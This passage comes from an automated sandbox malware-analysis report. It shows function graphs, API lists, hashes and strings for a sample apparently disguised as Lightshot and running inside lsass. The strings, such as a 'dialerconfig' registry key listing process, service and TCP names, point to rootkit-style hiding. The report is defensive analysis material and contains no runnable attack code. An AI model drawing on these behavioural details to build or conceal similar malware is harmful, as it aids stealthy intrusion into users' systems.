                                                                          control_flow_graph 396 7ff7b1c81800-7ff7b1c81810 397 7ff7b1c81824 396->397 398 7ff7b1c81812-7ff7b1c81822 396->398 399 7ff7b1c8182b-7ff7b1c81867 call 7ff7b1c82290 fprintf 397->399 398->399
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                          • Instruction ID: 11f6652f01d30d499a880f04845b0d96a5f2ff385f29a261dcb8f511d237959d
                                                                          • Opcode Fuzzy Hash: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                          • Instruction Fuzzy Hash: 46F0C811E1894582E310BB6CA98D1BDE360EB6A3D8FA09235DF4D57959DF5CF141C310
                                                                          Function 00007FF7B1C8219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                          • Instruction ID: ad6039847d7e89e39794c717edf85846451554120a9972110ce70758abdbfdca
                                                                          • Opcode Fuzzy Hash: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                          • Instruction Fuzzy Hash: 6E01D229A0950286F715AB5DBD8C17492607F26B99FE40131CF0D53E9CDFACA955C220

                                                                          Execution Graph

                                                                          Execution Coverage:1.1%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:132
                                                                          Total number of Limit Nodes:13
                                                                          execution_graph 14899 140adfc273c 14901 140adfc276a 14899->14901 14900 140adfc2858 LoadLibraryA 14900->14901 14901->14900 14902 140adfc28d4 14901->14902 14903 140ae86202c 14905 140ae86205d 14903->14905 14904 140ae86213e 14905->14904 14906 140ae862173 14905->14906 14912 140ae862081 14905->14912 14907 140ae8621e7 14906->14907 14908 140ae862178 14906->14908 14907->14904 14911 140ae862f04 7 API calls 14907->14911 14921 140ae862f04 GetProcessHeap 14908->14921 14910 140ae8620b9 StrCmpNIW 14910->14912 14911->14904 14912->14904 14912->14910 14914 140ae861bf4 14912->14914 14915 140ae861c8b Concurrency::details::SchedulerProxy::DeleteThis 14914->14915 14916 140ae861c1b GetProcessHeap 14914->14916 14915->14912 14918 140ae861c41 _invalid_parameter_noinfo 14916->14918 14917 140ae861c77 GetProcessHeap 14917->14915 14918->14915 14918->14917 14928 140ae86152c 14918->14928 14926 140ae862f40 _invalid_parameter_noinfo 14921->14926 14922 140ae863015 GetProcessHeap 14923 140ae863029 Concurrency::details::SchedulerProxy::DeleteThis 14922->14923 14923->14904 14924 140ae863010 14924->14922 14925 140ae862fa2 StrCmpNIW 14925->14926 14926->14922 14926->14924 14926->14925 14927 140ae861bf4 4 API calls 14926->14927 14927->14926 14929 140ae86157c 14928->14929 14932 140ae861546 14928->14932 14929->14917 14930 140ae861565 StrCmpW 14930->14932 14931 140ae86155d StrCmpIW 14931->14932 14932->14929 14932->14930 14932->14931 14933 140ae861abc 14939 140ae861628 GetProcessHeap 14933->14939 14935 140ae861ad2 Sleep SleepEx 14937 140ae861acb 14935->14937 14937->14935 14938 140ae861598 StrCmpIW StrCmpW 14937->14938 14984 140ae8618b4 14937->14984 14938->14937 14940 140ae861648 _invalid_parameter_noinfo 14939->14940 15001 140ae861268 GetProcessHeap 14940->15001 14942 140ae861650 14943 140ae861268 2 API calls 14942->14943 14944 140ae861661 14943->14944 14945 140ae861268 2 API calls 14944->14945 14946 140ae86166a 14945->14946 14947 140ae861268 2 API calls 14946->14947 14948 140ae861673 14947->14948 14949 140ae86168e RegOpenKeyExW 14948->14949 14950 140ae8618a6 14949->14950 14951 140ae8616c0 RegOpenKeyExW 14949->14951 14950->14937 14952 140ae8616ff RegOpenKeyExW 14951->14952 14953 140ae8616e9 14951->14953 14955 140ae861723 14952->14955 14956 140ae86173a RegOpenKeyExW 14952->14956 15012 140ae8612bc RegQueryInfoKeyW 14953->15012 15005 140ae86104c RegQueryInfoKeyW 14955->15005 14959 140ae861775 RegOpenKeyExW 14956->14959 14960 140ae86175e 14956->14960 14957 140ae8616f5 RegCloseKey 14957->14952 14961 140ae8617b0 RegOpenKeyExW 14959->14961 14962 140ae861799 14959->14962 14964 140ae8612bc 11 API calls 14960->14964 14967 140ae8617d4 14961->14967 14968 140ae8617eb RegOpenKeyExW 14961->14968 14966 140ae8612bc 11 API calls 14962->14966 14965 140ae86176b RegCloseKey 14964->14965 14965->14959 14969 140ae8617a6 RegCloseKey 14966->14969 14970 140ae8612bc 11 API calls 14967->14970 14971 140ae861826 RegOpenKeyExW 14968->14971 14972 140ae86180f 14968->14972 14969->14961 14973 140ae8617e1 RegCloseKey 14970->14973 14975 140ae861861 RegOpenKeyExW 14971->14975 14976 140ae86184a 14971->14976 14974 140ae86104c 4 API calls 14972->14974 14973->14968 14979 140ae86181c RegCloseKey 14974->14979 14977 140ae861885 14975->14977 14978 140ae86189c RegCloseKey 14975->14978 14980 140ae86104c 4 API calls 14976->14980 14982 140ae86104c 4 API calls 14977->14982 14978->14950 14979->14971 14981 140ae861857 RegCloseKey 14980->14981 14981->14975 14983 140ae861892 RegCloseKey 14982->14983 14983->14978 15024 140ae8614a4 14984->15024 15023 140ae876168 15001->15023 15003 140ae861283 GetProcessHeap 15004 140ae8612ae _invalid_parameter_noinfo 15003->15004 15004->14942 15006 140ae8611b5 RegCloseKey 15005->15006 15007 140ae8610bf 15005->15007 15006->14956 15007->15006 15008 140ae8610cf RegEnumValueW 15007->15008 15010 140ae861125 _invalid_parameter_noinfo Concurrency::details::SchedulerProxy::DeleteThis 15008->15010 15009 140ae86114e GetProcessHeap 15009->15010 15010->15006 15010->15008 15010->15009 15011 140ae86116e GetProcessHeap 15010->15011 15011->15010 15013 140ae861327 GetProcessHeap 15012->15013 15014 140ae86148a Concurrency::details::SchedulerProxy::DeleteThis 15012->15014 15020 140ae86133e _invalid_parameter_noinfo Concurrency::details::SchedulerProxy::DeleteThis 15013->15020 15014->14957 15015 140ae861476 GetProcessHeap 15015->15014 15016 140ae861352 RegEnumValueW 15016->15020 15017 140ae86152c 2 API calls 15017->15020 15018 140ae8613d3 GetProcessHeap 15018->15020 15019 140ae86141e lstrlenW GetProcessHeap 15019->15020 15020->15015 15020->15016 15020->15017 15020->15018 15020->15019 15021 140ae8613f3 GetProcessHeap 15020->15021 15022 140ae861443 StrCpyW 15020->15022 15021->15020 15022->15020 15025 140ae8614e1 GetProcessHeap 15024->15025 15026 140ae8614c1 GetProcessHeap 15024->15026 15030 140ae876180 15025->15030 15027 140ae8614da Concurrency::details::SchedulerProxy::DeleteThis 15026->15027 15027->15025 15027->15026 15031 140ae876182 15030->15031 15032 140ae86253c 15034 140ae8625bb 15032->15034 15033 140ae8627aa 15034->15033 15035 140ae86261d GetFileType 15034->15035 15036 140ae862641 15035->15036 15037 140ae86262b StrCpyW 15035->15037 15048 140ae861a40 GetFinalPathNameByHandleW 15036->15048 15038 140ae862650 15037->15038 15042 140ae86265a 15038->15042 15046 140ae8626ff 15038->15046 15041 140ae863844 StrCmpNIW 15041->15046 15042->15033 15053 140ae863844 15042->15053 15056 140ae863044 StrCmpIW 15042->15056 15060 140ae861cac 15042->15060 15045 140ae863044 4 API calls 15045->15046 15046->15033 15046->15041 15046->15045 15047 140ae861cac 2 API calls 15046->15047 15047->15046 15049 140ae861a6a StrCmpNIW 15048->15049 15050 140ae861aa9 15048->15050 15049->15050 15051 140ae861a84 lstrlenW 15049->15051 15050->15038 15051->15050 15052 140ae861a96 StrCpyW 15051->15052 15052->15050 15054 140ae863851 StrCmpNIW 15053->15054 15055 140ae863866 15053->15055 15054->15055 15055->15042 15057 140ae863076 StrCpyW StrCatW 15056->15057 15058 140ae86308d PathCombineW 15056->15058 15059 140ae863096 15057->15059 15058->15059 15059->15042 15061 140ae861cc3 15060->15061 15063 140ae861ccc 15060->15063 15062 140ae86152c 2 API calls 15061->15062 15062->15063 15063->15042

                                                                          Executed Functions

                                                                          Function 00000140AE86253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 58 140ae86253c-140ae8625c0 call 140ae882cc0 61 140ae8625c6-140ae8625c9 58->61 62 140ae8627d8-140ae8627fb 58->62 61->62 63 140ae8625cf-140ae8625dd 61->63 63->62 64 140ae8625e3-140ae862629 call 140ae868c60 * 3 GetFileType 63->64 71 140ae862641-140ae86264b call 140ae861a40 64->71 72 140ae86262b-140ae86263f StrCpyW 64->72 73 140ae862650-140ae862654 71->73 72->73 75 140ae8626ff-140ae862704 73->75 76 140ae86265a-140ae862673 call 140ae8630a8 call 140ae863844 73->76 77 140ae862707-140ae86270c 75->77 89 140ae862675-140ae8626a4 call 140ae8630a8 call 140ae863044 call 140ae861cac 76->89 90 140ae8626aa-140ae8626f4 call 140ae882cc0 76->90 79 140ae86270e-140ae862711 77->79 80 140ae862729 77->80 79->80 82 140ae862713-140ae862716 79->82 84 140ae86272c-140ae862745 call 140ae8630a8 call 140ae863844 80->84 82->80 85 140ae862718-140ae86271b 82->85 100 140ae862787-140ae862789 84->100 101 140ae862747-140ae862776 call 140ae8630a8 call 140ae863044 call 140ae861cac 84->101 85->80 88 140ae86271d-140ae862720 85->88 88->80 92 140ae862722-140ae862727 88->92 89->62 89->90 90->62 102 140ae8626fa 90->102 92->80 92->84 103 140ae8627aa-140ae8627ad 100->103 104 140ae86278b-140ae8627a5 100->104 101->100 121 140ae862778-140ae862783 101->121 102->76 107 140ae8627b7-140ae8627ba 103->107 108 140ae8627af-140ae8627b5 103->108 104->77 111 140ae8627d5 107->111 112 140ae8627bc-140ae8627bf 107->112 108->62 111->62 112->111 116 140ae8627c1-140ae8627c4 112->116 116->111 118 140ae8627c6-140ae8627c9 116->118 118->111 120 140ae8627cb-140ae8627ce 118->120 120->111 122 140ae8627d0-140ae8627d3 120->122 121->62 123 140ae862785 121->123 122->62 122->111 123->77
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382
                                                                          Function 00000140AE86202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 124 140ae86202c-140ae862057 call 140ae882d00 126 140ae86205d-140ae862066 124->126 127 140ae86206f-140ae862072 126->127 128 140ae862068-140ae86206c 126->128 129 140ae862223-140ae862243 127->129 130 140ae862078-140ae86207b 127->130 128->127 131 140ae862173-140ae862176 130->131 132 140ae862081-140ae862093 130->132 134 140ae8621e7-140ae8621ea 131->134 135 140ae862178-140ae862192 call 140ae862f04 131->135 132->129 133 140ae862099-140ae8620a5 132->133 136 140ae8620a7-140ae8620b7 133->136 137 140ae8620d3-140ae8620de call 140ae861bbc 133->137 134->129 138 140ae8621ec-140ae8621ff call 140ae862f04 134->138 135->129 147 140ae862198-140ae8621ae 135->147 136->137 140 140ae8620b9-140ae8620d1 StrCmpNIW 136->140 144 140ae8620ff-140ae862111 137->144 149 140ae8620e0-140ae8620f8 call 140ae861bf4 137->149 138->129 148 140ae862201-140ae862209 138->148 140->137 140->144 150 140ae862113-140ae862115 144->150 151 140ae862121-140ae862123 144->151 147->129 152 140ae8621b0-140ae8621cc 147->152 148->129 153 140ae86220b-140ae862213 148->153 149->144 166 140ae8620fa-140ae8620fd 149->166 155 140ae862117-140ae86211a 150->155 156 140ae86211c-140ae86211f 150->156 157 140ae862125-140ae862128 151->157 158 140ae86212a 151->158 159 140ae8621d0-140ae8621e3 152->159 162 140ae862216-140ae862221 153->162 160 140ae86212d-140ae862130 155->160 156->160 157->160 158->160 159->159 161 140ae8621e5 159->161 164 140ae862132-140ae862138 160->164 165 140ae86213e-140ae862141 160->165 161->129 162->129 162->162 164->133 164->165 165->129 167 140ae862147-140ae86214b 165->167 166->160 168 140ae862162-140ae86216e 167->168 169 140ae86214d-140ae862150 167->169 168->129 169->129 170 140ae862156-140ae86215b 169->170 170->167 171 140ae86215d 170->171 171->129
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: S$dialer
                                                                          • API String ID: 756756679-3873981283
                                                                          • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                          • Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
                                                                          • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                          • Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382
                                                                          Function 00000140AE861628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 4cb465b735a6020238bf1ea048d5c89955278629e63a0cab2664c088472f563d
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 5771E736750B10C6EB129F66E8906D933A5FB89BA8F201121DF4E97B79DF38C844C781
                                                                          Function 00000140AE861A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41
                                                                          Function 00000140AE86328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2
                                                                          Function 00000140AE861ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
                                                                            • Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
                                                                          • Sleep.KERNEL32 ref: 00000140AE861AD7
                                                                          • SleepEx.KERNELBASE ref: 00000140AE861ADD
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292
                                                                          Function 00000140ADFC273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 229 140adfc273c-140adfc27a4 call 140adfc29d4 * 4 238 140adfc27aa-140adfc27ad 229->238 239 140adfc29b2 229->239 238->239 241 140adfc27b3-140adfc27b6 238->241 240 140adfc29b4-140adfc29d0 239->240 241->239 242 140adfc27bc-140adfc27bf 241->242 242->239 243 140adfc27c5-140adfc27e6 242->243 243->239 245 140adfc27ec-140adfc280c 243->245 246 140adfc280e-140adfc2836 245->246 247 140adfc2838-140adfc283f 245->247 246->246 246->247 248 140adfc28df-140adfc28e6 247->248 249 140adfc2845-140adfc2852 247->249 251 140adfc28ec-140adfc2901 248->251 252 140adfc2992-140adfc29b0 248->252 249->248 250 140adfc2858-140adfc286a LoadLibraryA 249->250 253 140adfc286c-140adfc2878 250->253 254 140adfc28ca-140adfc28d2 250->254 251->252 255 140adfc2907 251->255 252->240 257 140adfc28c5-140adfc28c8 253->257 254->250 258 140adfc28d4-140adfc28d9 254->258 256 140adfc290d-140adfc2921 255->256 260 140adfc2982-140adfc298c 256->260 261 140adfc2923-140adfc2934 256->261 257->254 262 140adfc287a-140adfc287d 257->262 258->248 260->252 260->256 263 140adfc293f-140adfc2943 261->263 264 140adfc2936-140adfc293d 261->264 265 140adfc287f-140adfc28a5 262->265 266 140adfc28a7-140adfc28b7 262->266 269 140adfc294d-140adfc2951 263->269 270 140adfc2945-140adfc294b 263->270 268 140adfc2970-140adfc2980 264->268 271 140adfc28ba-140adfc28c1 265->271 266->271 268->260 268->261 272 140adfc2963-140adfc2967 269->272 273 140adfc2953-140adfc2961 269->273 270->268 271->257 272->268 275 140adfc2969-140adfc296c 272->275 273->268 275->268
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 06fb5e1ef4416040f010e1a7d6ba73e71e6e03eebacef6a42692c0d9d5c867cd
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 10610732B2179887DB65CF1690407AE7393FB58B98F688121DF5907BD4DA38D863E700

                                                                          Non-executed Functions

                                                                          Function 00000140AE862B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 605 140ae862b2c-140ae862ba5 call 140ae882ce0 608 140ae862ee0-140ae862f03 605->608 609 140ae862bab-140ae862bb1 605->609 609->608 610 140ae862bb7-140ae862bba 609->610 610->608 611 140ae862bc0-140ae862bc3 610->611 611->608 612 140ae862bc9-140ae862bd9 GetModuleHandleA 611->612 613 140ae862bed 612->613 614 140ae862bdb-140ae862beb call 140ae876090 612->614 616 140ae862bf0-140ae862c0e 613->616 614->616 616->608 619 140ae862c14-140ae862c33 StrCmpNIW 616->619 619->608 620 140ae862c39-140ae862c3d 619->620 620->608 621 140ae862c43-140ae862c4d 620->621 621->608 622 140ae862c53-140ae862c5a 621->622 622->608 623 140ae862c60-140ae862c73 622->623 624 140ae862c75-140ae862c81 623->624 625 140ae862c83 623->625 626 140ae862c86-140ae862c8a 624->626 625->626 627 140ae862c8c-140ae862c98 626->627 628 140ae862c9a 626->628 629 140ae862c9d-140ae862ca7 627->629 628->629 630 140ae862d9d-140ae862da1 629->630 631 140ae862cad-140ae862cb0 629->631 632 140ae862da7-140ae862daa 630->632 633 140ae862ed2-140ae862eda 630->633 634 140ae862cc2-140ae862ccc 631->634 635 140ae862cb2-140ae862cbf call 140ae86199c 631->635 636 140ae862dac-140ae862db8 call 140ae86199c 632->636 637 140ae862dbb-140ae862dc5 632->637 633->608 633->623 639 140ae862d00-140ae862d0a 634->639 640 140ae862cce-140ae862cdb 634->640 635->634 636->637 644 140ae862dc7-140ae862dd4 637->644 645 140ae862df5-140ae862df8 637->645 641 140ae862d0c-140ae862d19 639->641 642 140ae862d3a-140ae862d3d 639->642 640->639 647 140ae862cdd-140ae862cea 640->647 641->642 648 140ae862d1b-140ae862d28 641->648 649 140ae862d3f-140ae862d49 call 140ae861bbc 642->649 650 140ae862d4b-140ae862d58 lstrlenW 642->650 644->645 652 140ae862dd6-140ae862de3 644->652 653 140ae862e05-140ae862e12 lstrlenW 645->653 654 140ae862dfa-140ae862e03 call 140ae861bbc 645->654 655 140ae862ced-140ae862cf3 647->655 660 140ae862d2b-140ae862d31 648->660 649->650 656 140ae862d93-140ae862d98 649->656 662 140ae862d5a-140ae862d64 650->662 663 140ae862d7b-140ae862d8d call 140ae863844 650->663 664 140ae862de6-140ae862dec 652->664 658 140ae862e14-140ae862e1e 653->658 659 140ae862e35-140ae862e3f call 140ae863844 653->659 654->653 675 140ae862e4a-140ae862e55 654->675 655->656 657 140ae862cf9-140ae862cfe 655->657 668 140ae862e42-140ae862e44 656->668 657->639 657->655 658->659 669 140ae862e20-140ae862e33 call 140ae86152c 658->669 659->668 660->656 670 140ae862d33-140ae862d38 660->670 662->663 673 140ae862d66-140ae862d79 call 140ae86152c 662->673 663->656 663->668 674 140ae862dee-140ae862df3 664->674 664->675 668->633 668->675 669->659 669->675 670->642 670->660 673->656 673->663 674->645 674->664 679 140ae862e57-140ae862e5b 675->679 680 140ae862ecc-140ae862ed0 675->680 683 140ae862e63-140ae862e7d call 140ae8685c0 679->683 684 140ae862e5d-140ae862e61 679->684 680->633 686 140ae862e80-140ae862e83 683->686 684->683 684->686 688 140ae862ea6-140ae862ea9 686->688 689 140ae862e85-140ae862ea3 call 140ae8685c0 686->689 688->680 692 140ae862eab-140ae862ec9 call 140ae8685c0 688->692 689->688 692->680
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
